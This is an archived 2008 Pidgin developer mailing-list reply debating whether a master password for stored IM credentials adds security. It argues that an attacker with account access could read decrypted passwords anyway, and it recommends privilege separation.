How to save passwords more secure?!

Enrico Weigelt weigelt at metux.de
Tue Jul 1 18:18:49 EDT 2008 

* skyout at wired-security.net <skyout at wired-security.net> wrote:

> This is nothing problematic until the following point: A users computer
> gets compromised by a virus. The virus could simply read out all the ICQ
> UINs and can be quite sure the other ICQ user (those the UIN belongs to)
> has granted access to OUR user to write messages. 

If you're whole computer is compromised, you've got far worse problems 
that that. So you first have to make sure this cannot happend. The first 
step: kick off M$ crap! Second: use different (unprivileged !) accounts 
for different things and properly set up permissions.

You could, for example, run pidgin on an different uid. Well, the x11
protocol isn't very secure between apps which have access to the same
display, so you perhaps want to put an proxy in between which filters
out unwanted calls.

Another idea - which requires major redesign but is also good for lots
of other things - is to move out the core protocol handling to an 
separte server (the GUI then is just a client connecting to that server),
which can also run under different uid. 9P2000 is a very fine protocol
for the IPC.

> I have five accounts in my Pidgin. Typing five passwords all the time 
> I log into my messenger to start chatting would really suck, but one 
> password to decrypt all the others, that would be still a good usability!

As others already noted: this won't help much - as soon you're account
(pidgin is running on) is compromised, the attacker can just use 
ptrace() to debug the pidgin process and read out the decrypted password.
So you gained *NO* additional security, but just made the whole code
much morecomplex.


cu
-- 
----------------------------------------------------------------------
 Enrico Weigelt, metux IT service -- http://www.metux.de/

 cellphone: +49 174 7066481   email: info at metux.de   skype: nekrad666
----------------------------------------------------------------------
 Embedded-Linux / Portierung / Opensource-QM / Verteilte Systeme
----------------------------------------------------------------------

More information about the Devel mailing list